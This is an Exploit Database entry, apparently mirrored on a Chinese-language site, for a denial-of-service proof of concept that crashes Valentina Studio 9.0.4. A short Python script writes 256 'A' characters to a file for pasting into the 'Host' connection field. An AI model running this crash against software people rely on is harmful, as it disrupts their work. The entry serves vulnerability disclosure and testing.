Valentina Studio 9.0.4 – ‘Host’ Denial of Service (PoC)

Exploit Database
85 阅读

作者： Victor Mondragón

日期： 2019-02-19
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46421/

#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed

cod = "\x41" * 256

f = open('valentina.txt', 'w')
f.write(cod)
f.close()

last Exploits
Valentina Studio 9.0.4 – ‘Host’ Denial of Service (PoC)的更多信息

Gom Player 2.1.44.5123 – ‘UNICODE’ Null Pointer Dereference：
PHP 7.0 – ‘AppendIterator::append’ Local Denial of Service：
Tuniac 100723 – Denial of Service：
WinMerge 2.12.4 – Project File Handling Stack Overflow：
Android WiFi-Direct – Denial of Service：
PHP – ‘openssl_x509_parse()’ Memory Corruption：
PHP 5.4/5.5/5.6 – ‘Unserialize()’ Use-After-Free：
ComSndFTP Server 1.3.7 Beta – Remote Format String Overflow：